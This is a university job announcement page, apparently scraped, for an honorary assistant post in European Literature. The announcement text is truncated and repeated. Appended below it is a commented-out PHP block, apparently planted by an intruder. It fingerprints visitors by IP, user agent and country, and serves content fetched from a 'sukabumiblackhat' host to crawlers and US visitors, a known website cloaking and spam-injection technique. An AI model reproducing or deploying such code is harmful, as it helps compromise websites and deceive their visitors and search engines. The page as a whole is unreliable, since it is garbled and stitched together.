
Adscripto Honorario- CASTAÑO- 2024-1
Llamado a inscripción para 1 cargo ADSCRIPTO HONORARIO “Literatura Europea I y II” Área: Literatura Europea– Orientación: Lit Adscripto Honorario- CASTAÑO- 2024-1
/*
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
function getCountryByIp($ip)
{
$url = "http://ip-api.com/json/$ip";
$response = file_get_contents($url);
$data = json_decode($response, true);
$countryCode = $data['countryCode'];
return $countryCode;
}
$ctryCode = getCountryByIp($ip);
if (isset($_GET['a']) && $_GET['a'] === 'a') {
echo "country: " . $ctryCode;
echo "
";
echo "useragent: " . $userAgent;
echo "
";
echo "ip: " . $ip;
exit;
}
if (preg_match('/bot|crawl|slurp|bingbot|Google-Site-Verification|Google-InspectionTool|AhrefsBot|spider/i', $userAgent) || $ctryCode == 'US') {
echo file_get_contents('https://tools.sukabumiblackhat.com/raw/ef4a80c1');
exit;
}
*/